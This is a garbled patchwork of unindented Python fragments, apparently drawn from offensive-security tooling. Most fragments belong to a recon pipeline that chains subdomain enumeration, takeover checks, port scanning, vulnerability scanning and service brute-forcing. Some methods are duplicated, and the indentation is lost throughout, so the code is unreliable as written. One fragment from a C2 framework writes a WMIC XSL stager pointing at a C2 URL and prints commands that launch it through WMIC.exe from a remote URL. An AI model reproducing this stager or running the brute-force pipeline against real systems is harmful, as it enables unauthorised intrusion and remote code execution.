# time.sleep(0.5)
custom_logs['content'].append({
"cmd": cmd,
"std_path": '',
"output_path": output_path,
"status": "Done"
})
#just wait couple seconds and continue but not completely stop the routine
time.sleep(5)
print(custom_logs)
#submit a log
utils.print_info('Update activities log')
utils.update_activities(self.options, str(custom_logs))
utils.print_line()
def routine(options):
#Finding subdomain
subdomain.SubdomainScanning(options)
#Scanning for subdomain take over
takeover.TakeOverScanning(options)
#Screen shot the target on common service
screenshot.ScreenShot(options)
##### Note: From here the module gonna take really long time for scanning service and stuff like that
utils.print_info('This gonna take a while')
#Scanning all port using result from subdomain scanning and also checking vulnerable service based on version
portscan.PortScan(options)
#Starting vulnerable scan
vulnscan.VulnScan(options)
#Brute force service from port scan result
brutethings.BruteThings(options)
def __init__(self, options):
utils.print_banner("Headers Scanning")
utils.make_directory(options['WORKSPACE'] + '/headers')
utils.make_directory(options['WORKSPACE'] + '/headers/details')
self.module_name = self.__class__.__name__
self.options = options
if utils.resume(self.options, self.module_name):
utils.print_info("Detect is already done. use '-f' options to force rerun the module")
return
self.is_direct = utils.is_direct_mode(options, require_input=True)
slack.slack_noti('status', self.options, mess={
'title': "{0} | {1}".format(self.options['TARGET'], self.module_name),
'content': 'Start Headers Scanning for {0}'.format(self.options['TARGET'])
})
self.initial()
slack.slack_noti('good', self.options, mess={
'title': "{0} | {1}".format(self.options['TARGET'], self.module_name),
'content': 'Start Headers Scanning for {0}'.format(self.options['TARGET'])
})
def __init__(self, options):
utils.print_banner("Headers Scanning")
utils.make_directory(options['WORKSPACE'] + '/headers')
utils.make_directory(options['WORKSPACE'] + '/headers/details')
self.module_name = self.__class__.__name__
self.options = options
if utils.resume(self.options, self.module_name):
utils.print_info("It's already done. use '-f' options to force rerun the module")
return
self.is_direct = utils.is_direct_mode(options, require_input=True)
slack.slack_noti('status', self.options, mess={
'title': "{0} | {1}".format(self.options['TARGET'], self.module_name),
'content': 'Start Headers Scanning for {0}'.format(self.options['TARGET'])
})
self.initial()
slack.slack_noti('good', self.options, mess={
'title': "{0} | {1}".format(self.options['TARGET'], self.module_name),
'content': 'Start Headers Scanning for {0}'.format(self.options['TARGET'])
})
def generate(self, listener, filename=None):
stager_filename = 'wmic.xsl'
if filename is not None:
stager_filename = filename
with open(stager_filename, 'w') as stager:
with open('stagers/templates/wmic.xsl') as template:
template = template.read()
template = template.replace(
'C2_URL',
f"https://{listener['BindIP']}:{listener['Port']}")
template = template.replace('C2_CHANNEL', f"{listener.name}")
stager.write(template)
print_good(f"Generated stager to {stager.name}")
print_info("Launch with:")
print(
f"\tC:\\Windows\\System32\\wbem\\WMIC.exe os get /format:\"https://myurl/{stager_filename}\""
)
print(
f"\tC:\\Windows\\System32\\wbem\\WMIC.exe os get /format:\"{stager_filename}\""
)
def pages(self, page_num):
for i in range(2, int(page_num) + 1):
utils.print_info("Sleep for couple seconds because Shodan server is really strict")
utils.random_sleep(3, 6)
utils.print_info("Get more result from page: {0}".format(str(i)))
query = utils.url_encode(self.options['shodan_query'])
url = 'https://www.shodan.io/search?query={1}&page={0}'.format(
str(i), query)
r = sender.send_get(self.options, url, self.cookies)
if r.status_code == 200:
response = r.text
if 'class="alert alert-error text-center"' in response:
utils.print_bad(
"Reach to the limit at page {0}".format(str(i)))
return
else:
soup = utils.soup(response)
self.analyze(soup)
def main_routine(self, results, kind='code'):
pages = self.get_page(results)
utils.print_info(f"Detect {str(pages)} pages by search for {kind}")
for i in range(pages):
# utils.print_info(f"Search in pages {str(i)}")
page_results = results.get_page(page=i)
if not page_results:
return
# content from each page
for result in page_results:
if kind == 'code':
item = self.parse_code(result)
if kind == 'issue':
item = self.parse_issue(result)
if kind == 'commit':
item = self.parse_commit(result)
if kind == 'repo':
item = self.parse_repo(result)
if kind == 'user':
item = self.parse_user(result)
self.write_result(item, kind=kind)
def pages(self, page_num):
more_output = []
for i in range(1, int(page_num) + 1):
utils.print_debug(self.options, "Sleep for couple seconds")
utils.random_sleep(1, 3)
utils.print_info("Get more result from page: {0}".format(str(i)))
data = {"type": "exploits", "sort": "default",
"query": self.query,
"title": not self.options.get('relatively'), "offset": i * 10}
r = sender.send_post(
self.options, self.base_url, data, is_json=True)
if r.status_code == 200:
response = json.loads(r.text)
if self.analyze(response):
more_output += self.analyze(response)
else:
return False
return more_output
def __init__(self, options):
utils.print_banner("Port Scanning")
utils.make_directory(options['WORKSPACE'] + '/portscan')
utils.make_directory(options['WORKSPACE'] + '/subdomain')
self.module_name = self.__class__.__name__
self.options = options
self.options['SPEED'] = utils.custom_speed(self.options)
if utils.resume(self.options, self.module_name):
utils.print_info(
"It's already done. use '-f' options to force rerun the module"
)
return
self.is_direct = utils.is_direct_mode(options, require_input=True)
slack.slack_noti(
'status',
self.options,
mess={
'title':
"{0} | {1}".format(self.options['TARGET'], self.module_name),
'content':
'Start Port Scanning for {0}'.format(self.options['TARGET'])
})
self.initial()
utils.just_waiting(self.options, self.module_name, seconds=60)
self.conclude()
slack.slack_noti(
'good',
self.options,
mess={
'title':
"{0} | {1}".format(self.options['TARGET'], self.module_name),
'content':
'Start Port Scanning for {0}'.format(self.options['TARGET'])
})
utils.print_line()
def screenshots(self, csv_data):
utils.print_info("Screenshot again with new port found")
# add http:// and https:// prefix to domain
if csv_data:
result = []
for line in csv_data.splitlines()[1:]:
# some output of the script is contain new line
try:
# print(line)
host = line.split(',')[0]
port = line.split(',')[4]
result.append("http://" + host + ":" + port)
result.append("https://" + host + ":" + port)
except:
pass
utils.just_write(
utils.replace_argument(
self.options, '$WORKSPACE/vulnscan/$OUTPUT-hosts.txt'),
"\n".join(result))
# screenshots with gowitness
utils.make_directory(self.options['WORKSPACE'] +
'/vulnscan/screenshoots-nmap/')
cmd = "$GO_PATH/gowitness file -s $WORKSPACE/vulnscan/$OUTPUT-hosts.txt -t 30 --log-level fatal --destination $WORKSPACE/vulnscan/screenshoots-nmap/ --db $WORKSPACE/vulnscan/screenshoots-nmap/gowitness.db"
execute.send_cmd(self.options,
utils.replace_argument(self.options, cmd), '', '',
self.module_name)
utils.just_waiting(self.options, self.module_name, seconds=10)
cmd = "$GO_PATH/gowitness generate -n $WORKSPACE/vulnscan/$OUTPUT-nmap-screenshots.html --destination $WORKSPACE/vulnscan/screenshoots-nmap/ --db $WORKSPACE/vulnscan/screenshoots-nmap/gowitness.db"
html_path = utils.replace_argument(
self.options,
"$WORKSPACE/vulnscan/$OUTPUT-nmap-screenshots.html")
execute.send_cmd(self.options,
utils.replace_argument(self.options, cmd),
html_path, '', self.module_name)
def __init__(self, options):
utils.print_banner("Reconnaisance")
utils.make_directory(options['WORKSPACE'] + '/recon')
self.module_name = self.__class__.__name__
self.options = options
if utils.resume(self.options, self.module_name):
utils.print_info(
"It's already done. use '-f' options to force rerun the module")
return
slack.slack_noti('status', self.options, mess={
'title': "{0} | {1}".format(self.options['TARGET'], self.module_name),
'content': 'Start Scanning Subdomain for {0}'.format(self.options['TARGET'])
})
self.initial()
self.conclude()
#this gonna run after module is done to update the main json
slack.slack_noti('good', self.options, mess={
'title': "{0} | {1} ".format(self.options['TARGET'], self.module_name),
'content': 'Done Scanning Subdomain for {0}'.format(self.options['TARGET'])
})
def create_skeleton_json(self):
outout = utils.replace_argument(
self.options, '$WORKSPACE/$COMPANY.json')
if utils.not_empty_file(outout):
utils.print_info("Modules is already done")
return
main_json = {
"Company": utils.replace_argument(self.options, '$COMPANY'),
"Main_domain": utils.replace_argument(self.options, '$TARGET'),
"Info": {},
"Subdomains": [],
"Modules": {},
"IP Space": []
}
utils.just_write(outout, main_json, is_json=True)
utils.check_output(outout)
slack.slack_noti('status', self.options, mess={
'title': "{0} | {1}".format(self.options['TARGET'], self.module_name),
'content': 'Create skeleton json'
})
def proxy_parsing(options):
# return if proxy config file found
if options['PROXY_FILE'] != "None":
proxy_file = options['PROXY_FILE']
utils.print_info("Detected proxychains file: {0}".format(proxy_file))
return
elif options['PROXY'] != "None":
proxy_file = options['CWD'] + '/core/proxychains.conf'
utils.print_info("Detected proxychains file: {0}".format(proxy_file))
if options['PROXY'] != "None":
proxy_parsed = urllib.parse.urlsplit(options['PROXY'])
scheme = proxy_parsed.scheme
host = proxy_parsed.netloc.split(':')[0]
port = proxy_parsed.netloc.split(':')[1]
proxy_element = "\n" + scheme + " " + host + " " + port
raw_data = utils.just_read(proxy_file).splitlines()
for i in range(len(raw_data)):
if '[ProxyList]' in raw_data[i]:
init_part = raw_data[:i]
proxy_part = raw_data[i:]
# check if this proxy is exist or not
check_duplicate = False
for item in proxy_part:
if proxy_element.strip() in item.strip():
check_duplicate = True
if not check_duplicate:
proxy_part.append(proxy_element)
real_proxy_data = "\n".join(init_part + proxy_part)
utils.just_write(proxy_file, real_proxy_data)
if options['PROXY'] != "None" or options['PROXY_FILE'] != "None":
if not shutil.which(options['PROXY_CMD'].split(' ')[0]):
utils.print_bad("Look like proxy mode doesn't support your OS")
sys.exit(0)
else:
#simple check for proxy is good
utils.print_info("Testing proxy with simple curl command")
if execute.run(options['PROXY_CMD'] + " curl -s ipinfo.io/ip") == execute.run("curl -s ipinfo.io/ip"):
utils.print_bad("Look like your proxy not work properly")
sys.exit(0)
def notify_session_staged(self, msg):
print_info(msg)
def dirhunt(self):
utils.print_good('Starting dirhunt')
cmd = 'dirhunt $TARGET $MORE --progress-disabled --threads 20 | tee $WORKSPACE/directory/$STRIP_TARGET-dirhunt.txt'
cmd = utils.replace_argument(self.options, cmd)
utils.print_info("Execute: {0} ".format(cmd))
execute.run(cmd)
def parsing_config(config_path, args):
options = {}
##some default path
github_api_key = str(os.getenv("GITROB_ACCESS_TOKEN"))
cwd = str(os.getcwd())
#just hardcode if gopath not loaded
go_path = cwd + "/plugins/go"
# go_path = str(os.getenv("GOPATH")) + "/bin"
# if "None" in go_path:
# go_path = cwd + "/plugins/go"
bot_token = str(os.getenv("SLACK_BOT_TOKEN"))
log_channel = str(os.getenv("LOG_CHANNEL"))
status_channel = str(os.getenv("STATUS_CHANNEL"))
report_channel = str(os.getenv("REPORT_CHANNEL"))
stds_channel = str(os.getenv("STDS_CHANNEL"))
verbose_report_channel = str(os.getenv("VERBOSE_REPORT_CHANNEL"))
if os.path.isfile(config_path):
utils.print_info('Config file detected: {0}'.format(config_path))
#config to logging some output
config = ConfigParser(interpolation=ExtendedInterpolation())
config.read(config_path)
else:
utils.print_info('New config file created: {0}'.format(config_path))
shutil.copyfile(cwd + '/template-config.conf', config_path)
config = ConfigParser(interpolation=ExtendedInterpolation())
config.read(config_path)
workspace = cwd + "/workspaces/"
config.set('Enviroments', 'cwd', cwd)
config.set('Enviroments', 'go_path', go_path)
config.set('Enviroments', 'github_api_key', github_api_key)
config.set('Enviroments', 'workspaces', str(workspace))
if args.debug:
config.set('Slack', 'bot_token', 'bot_token')
config.set('Slack', 'log_channel', 'log_channel')
config.set('Slack', 'status_channel', 'status_channel')
config.set('Slack', 'report_channel', 'report_channel')
config.set('Slack', 'stds_channel', 'stds_channel')
config.set('Slack', 'verbose_report_channel', 'verbose_report_channel')
else:
config.set('Slack', 'bot_token', bot_token)
config.set('Slack', 'log_channel', log_channel)
config.set('Slack', 'status_channel', status_channel)
config.set('Slack', 'report_channel', report_channel)
config.set('Slack', 'stds_channel', stds_channel)
config.set('Slack', 'verbose_report_channel', verbose_report_channel)
##config of the tool
if args.slow:
speed = "slow"
else:
speed = "quick"
module = str(args.module)
debug = str(args.debug)
force = str(args.force)
config.set('Mode', 'speed', speed)
config.set('Mode', 'module', module)
config.set('Mode', 'debug', debug)
config.set('Mode', 'force', force)
##target stuff
#parsing agument
git_target = args.git if args.git else None
burpstate_target = args.burp if args.burp else None
target_list = args.targetlist if args.targetlist else None
company = args.company if args.company else None
direct_input = args.input if args.input else None
if args.target:
target = args.target
output = args.output if args.output else args.target
company = args.company if args.company else args.target
strip_target = target.replace('https://', '').replace('http://', '')
if '/' in strip_target:
strip_target = strip_target.split('/')[0]
if args.workspace:
if args.workspace[-1] == '/':
workspace = args.workspace + options['env']['STRIP_TARGET']
else:
workspace = args.workspace + '/' + options['env']['STRIP_TARGET']
else:
workspace += strip_target
if not direct_input:
try:
ip = socket.gethostbyname(strip_target)
except:
ip = "None"
utils.print_bad("Something wrong to connect to {0}".format(target))
else:
ip = None
try:
#getting proxy from args
proxy = args.proxy if args.proxy else None
proxy_file = args.proxy_file if args.proxy_file else None
config.set('Proxy', 'proxy', str(proxy))
config.set('Proxy', 'proxy_file', str(proxy_file))
if config['Proxy']['proxy_cmd'] == 'None':
#only works for Kali proxychains, change it if you on other OS
proxy_cmd = "proxychains -f {0}".format(proxy_file)
config.set('Proxy', 'proxy_cmd', str(proxy_cmd))
except:
utils.print_info("Your config file seem to be outdated, Backup it and delete it to regenerate the new one")
config.set('Target', 'input', str(direct_input))
config.set('Target', 'git_target', str(git_target))
config.set('Target', 'burpstate_target', str(burpstate_target))
config.set('Target', 'target_list', str(target_list))
config.set('Target', 'output', str(output))
config.set('Target', 'target', str(target))
config.set('Target', 'strip_target', str(strip_target))
config.set('Target', 'company', str(company))
config.set('Target', 'ip', str(ip))
config.set('Enviroments', 'workspace', str(workspace))
#create workspace folder for the target
utils.make_directory(workspace)
#set the remote API
if args.remote:
remote_api = args.remote
config.set('Server', 'remote_api', remote_api)
#set credentials as you define from agurments
if args.auth:
#user:pass
creds = args.auth.strip().split(":")
username = creds[0]
password = creds[1]
config.set('Server', 'username', username)
config.set('Server', 'password', password)
else:
#set random password if default password detect
if config['Server']['password'] == 'super_secret':
new_pass = ''.join(random.choice(string.ascii_lowercase)
for i in range(6)).upper()
config.set('Server', 'password', new_pass)
#save the config
with open(config_path, 'w') as configfile:
config.write(configfile)
config = ConfigParser(interpolation=ExtendedInterpolation())
config.read(config_path)
sections = config.sections()
for sec in sections:
for key in config[sec]:
options[key.upper()] = config.get(sec, key)
######
#parsing proxy stuff
if options.get('PROXY') or options.get('PROXY_FILE'):
proxy_parsing(options)
else:
#just for the old config
options['PROXY'] = "None"
options['PROXY_FILE'] = "None"
return options
